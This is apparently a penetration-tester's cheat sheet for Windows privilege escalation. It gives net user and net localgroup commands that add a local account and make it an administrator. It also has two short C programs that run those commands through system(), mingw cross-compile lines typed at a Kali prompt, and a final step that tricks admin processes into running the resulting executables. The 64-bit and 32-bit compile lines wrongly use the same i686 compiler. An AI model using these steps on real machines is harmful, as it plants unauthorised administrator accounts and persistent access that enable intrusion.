Add admin user

Notes

• Already had admin privilege

1. Check if has admin privilege

• net user newuser newpass /add
• mkdir C:\test

2A. If having a SYSTEM SHELL

• net user newuser newpass /add
• net localgroup administrators newuser /add

2B. If has no SYSTEM Shell, to trick the admin processes to add admin user

Add newuser with newpass

vim addnewuser.c

• #include <stdlib.h> /* system, NULL, EXIT_FAILURE */
• int main ()
• {
• int i;
• i=system ("net user newuser newpass /add");
• return 0;
• }

Add newuser to admin group

vim addusertoAdmin.c

• #include <stdlib.h> /* system, NULL, EXIT_FAILURE */
• int main ()
• {
• int i;
• i=system ("net localgroup administrators newuser /add");
• return 0;
• }

Compile to exe

Add new user

• Windows 64-bit target: root@kali:~# i686-w64-mingw32-gcc -o addnewuser.exe addnewuser.c
• Windows 32-bit target: root@kali:~# i686-w64-mingw32-gcc -o addnewuser.exe addnewuser.c -lws2_32

Add user to admin

• Windows 64-bit target: root@kali:~# i686-w64-mingw32-gcc -o addusertoAdmin.exe addusertoAdmin.c
• Windows 32-bit target: root@kali:~# i686-w64-mingw32-gcc -o addusertoAdmin.exe addusertoAdmin.c -lws2_32

Put the exe files to admin proccesses

To leverage the admin processes to run these exe files.